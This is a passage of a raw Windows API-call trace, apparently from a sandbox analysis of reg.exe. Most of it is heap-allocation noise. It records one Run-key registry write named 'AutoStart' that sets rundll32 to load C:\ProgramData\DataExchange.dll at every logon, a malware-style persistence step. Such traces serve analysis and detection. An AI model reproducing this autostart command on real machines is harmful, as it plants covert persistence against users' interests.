0x375cd0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375d00 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375d30 [0215.016] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0215.017] GetProcessHeap () returned 0x360000 [0215.017] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b810 [0215.017] _memicmp (_Buf1=0x37b810, _Buf2=0xff271458, _Size=0x7) returned 0 [0215.017] GetProcessHeap () returned 0x360000 [0215.017] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x1e) returned 0x375d60 [0215.017] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.017] GetProcessHeap () returned 0x360000 [0215.017] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b830 [0215.017] _memicmp (_Buf1=0x37b830, _Buf2=0xff271458, _Size=0x7) returned 0 [0215.017] GetProcessHeap () returned 0x360000 [0215.017] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x6c) returned 0x37b9b0 [0215.017] _vsnwprintf (in: _Buffer=0x375d60, _BufferCount=0xe, _Format="|%s|", _ArgList=0x26f7c8 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0215.017] _vsnwprintf (in: _Buffer=0x37b9b0, _BufferCount=0x35, _Format="|%s|", _ArgList=0x26f7c8 | out: _Buffer="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0215.017] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0215.017] lstrlenW (lpString="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0215.017] SetLastError (dwErrCode=0x490) [0215.017] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.017] GetProcessHeap () returned 0x360000 [0215.017] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x66) returned 0x37ba30 [0215.017] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.018] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0215.019] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0215.019] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.019] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0215.019] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.019] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0215.019] StrChrIW (lpStart="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" [0215.020] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0215.020] GetProcessHeap () returned 0x360000 [0215.020] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x28) returned 0x375d90 [0215.020] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0215.020] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0215.021] SetLastError (dwErrCode=0x490) [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] SetLastError (dwErrCode=0x0) [0215.021] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0215.021] GetProcessHeap () returned 0x360000 [0215.021] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x5c) returned 0x37bc90 [0215.021] GetProcessHeap () returned 0x360000 [0215.021] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x88) returned 0x37bd00 [0215.021] GetProcessHeap () returned 0x360000 [0215.021] GetProcessHeap () returned 0x360000 [0215.021] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375d90) returned 1 [0215.021] GetProcessHeap () returned 0x360000 [0215.021] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375d90) returned 0x28 [0215.022] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375d90 | out: hHeap=0x360000) returned 1 [0215.022] GetProcessHeap () returned 0x360000 [0215.022] GetProcessHeap () returned 0x360000 [0215.022] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba30) returned 1 [0215.022] GetProcessHeap () returned 0x360000 [0215.022] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37ba30) returned 0x66 [0215.022] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba30 | out: hHeap=0x360000) returned 1 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0215.022] lstrlenW (lpString="AutoStart") returned 9 [0215.022] GetProcessHeap () returned 0x360000 [0215.022] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x14) returned 0x37b850 [0215.022] lstrlenW (lpString="AutoStart") returned 9 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0215.022] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0215.022] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0215.022] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0215.023] lstrlenW (lpString="REG_SZ") returned 6 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0215.023] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0215.023] LocalFree (hMem=0x37ba30) returned 0x0 [0215.023] SetLastError (dwErrCode=0x0) [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0215.023] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0215.023] lstrlenW (lpString="rundll32.exe C:\\ProgramData\\DataExchange.dll,Start") returned 50 [0215.023] GetProcessHeap () returned 0x360000 [0215.023] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x66) returned 0x37ba30 [0215.023] SetLastError (dwErrCode=0x0) [0215.023] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x26f8a0, lpdwDisposition=0x26f8c0 | out: phkResult=0x26f8a0*=0x54, lpdwDisposition=0x26f8c0*=0x2) returned 0x0 [0215.023] RegQueryValueExW (in: hKey=0x54, lpValueName="AutoStart", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0215.024] lstrlenW (lpString="rundll32.exe C:\\ProgramData\\DataExchange.dll,Start") returned 50 [0215.024] RegSetValueExW (in: hKey=0x54, lpValueName="AutoStart", Reserved=0x0, dwType=0x1, lpData="rundll32.exe C:\\ProgramData\\DataExchange.dll,Start", cbData=0x66 | out: lpData="rundll32.exe C:\\ProgramData\\DataExchange.dll,Start") returned 0x0 [0215.024] RegCloseKey (hKey=0x54) returned 0x0 [0215.024] GetProcessHeap () returned 0x360000 [0215.024] GetProcessHeap () returned 0x360000 [0215.024] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37bc90) returned 1 [0215.024] GetProcessHeap () returned 0x360000 [0215.024] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37bc90) returned 0x5c [0215.024] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37bc90 | out: hHeap=0x360000) returned 1 [0215.024] GetProcessHeap () returned 0x360000 [0215.024] GetProcessHeap () returned 0x360000 [0215.024] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37bd00) returned 1 [0215.024] GetProcessHeap () returned 0x360000 [0215.025] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37bd00) returned 0x88 [0215.025] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37bd00 | out: hHeap=0x360000) returned 1 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b850) returned 1 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b850) returned 0x14 [0215.025] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b850 | out: hHeap=0x360000) returned 1 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba30) returned 1 [0215.025] GetProcessHeap () returned 0x360000 [0215.025] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37ba30) returned 0x66 [0215.025] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37ba30 | out: hHeap=0x360000) returned 1 [0215.025] SetLastError (dwErrCode=0x0) [0215.025] GetLastError () returned 0x0 [0215.025] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x26f820, nSize=0x0, Arguments=0x0 | out: lpBuffer="먰7") returned 0x27 [0215.027] GetLastError () returned 0x0 [0215.027] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0215.027] GetProcessHeap () returned 0x360000 [0215.027] GetProcessHeap () returned 0x360000 [0215.027] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b790) returned 1 [0215.027] GetProcessHeap () returned 0x360000 [0215.027] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b790) returned 0x2 [0215.027] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b790 | out: hHeap=0x360000) returned 1 [0215.027] GetProcessHeap () returned 0x360000 [0215.027] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x50) returned 0x37bc90 [0215.027] SetLastError (dwErrCode=0x0) [0215.027] LocalFree (hMem=0x37ba30) returned 0x0 [0215.027] __iob_func () returned 0x7feffb12a80 [0215.027] _fileno (_File=0x7feffb12ab0) returned 1 [0215.027] _errno () returned 0x194bb0 [0215.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.027] _errno () returned 0x194bb0 [0215.027] GetFileType (hFile=0x7) returned 0x2 [0215.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f7a0 | out: lpMode=0x26f7a0) returned 1 [0215.029] __iob_func () returned 0x7feffb12a80 [0215.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.029] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0215.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x37bc90*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x26f810, lpReserved=0x0 | out: lpBuffer=0x37bc90*, lpNumberOfCharsWritten=0x26f810*=0x27) returned 1 [0215.029] GetProcessHeap () returned 0x360000 [0215.029] GetProcessHeap () returned 0x360000 [0215.029] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b9b0) returned 1 [0215.029] GetProcessHeap () returned 0x360000 [0215.029] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b9b0) returned 0x6c [0215.029] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b9b0 | out: hHeap=0x360000) returned 1 [0215.029] GetProcessHeap () returned 0x360000 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b830) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b830) returned 0x18 [0215.030] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b830 | out: hHeap=0x360000) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375cd0) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375cd0) returned 0x20 [0215.030] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375cd0 | out: hHeap=0x360000) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375d60) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375d60) returned 0x1e [0215.030] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375d60 | out: hHeap=0x360000) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b810) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b810) returned 0x18 [0215.030] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b810 | out: hHeap=0x360000) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375ca0) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.030] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375ca0) returned 0x20 [0215.030] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375ca0 | out: hHeap=0x360000) returned 1 [0215.030] GetProcessHeap () returned 0x360000 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37bc90) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37bc90) returned 0x50 [0215.031] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37bc90 | out: hHeap=0x360000) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375af0) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375af0) returned 0x20 [0215.031] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375af0 | out: hHeap=0x360000) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375b20) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375b20) returned 0x20 [0215.031] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375b20 | out: hHeap=0x360000) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375b50) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375b50) returned 0x20 [0215.031] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375b50 | out: hHeap=0x360000) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375b80) returned 1 [0215.031] GetProcessHeap () returned 0x360000 [0215.031] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375b80) returned 0x20 [0215.032] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375b80 | out: hHeap=0x360000) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7b0) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b7b0) returned 0x18 [0215.032] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7b0 | out: hHeap=0x360000) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375bb0) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375bb0) returned 0x20 [0215.032] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375bb0 | out: hHeap=0x360000) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375be0) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375be0) returned 0x20 [0215.032] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375be0 | out: hHeap=0x360000) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375c10) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375c10) returned 0x20 [0215.032] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375c10 | out: hHeap=0x360000) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375c40) returned 1 [0215.032] GetProcessHeap () returned 0x360000 [0215.032] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375c40) returned 0x20 [0215.033] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375c40 | out: hHeap=0x360000) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7d0) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b7d0) returned 0x18 [0215.033] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7d0 | out: hHeap=0x360000) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375c70) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375c70) returned 0x20 [0215.033] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375c70 | out: hHeap=0x360000) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375d00) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375d00) returned 0x20 [0215.033] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375d00 | out: hHeap=0x360000) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7f0) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b7f0) returned 0x18 [0215.033] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b7f0 | out: hHeap=0x360000) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x375d30) returned 1 [0215.033] GetProcessHeap () returned 0x360000 [0215.033] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x375d30) returned 0x20 [0215.034] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x375d30 | out: hHeap=0x360000) returned 1 [0215.034] GetProcessHeap () returned 0x360000 [0215.034] 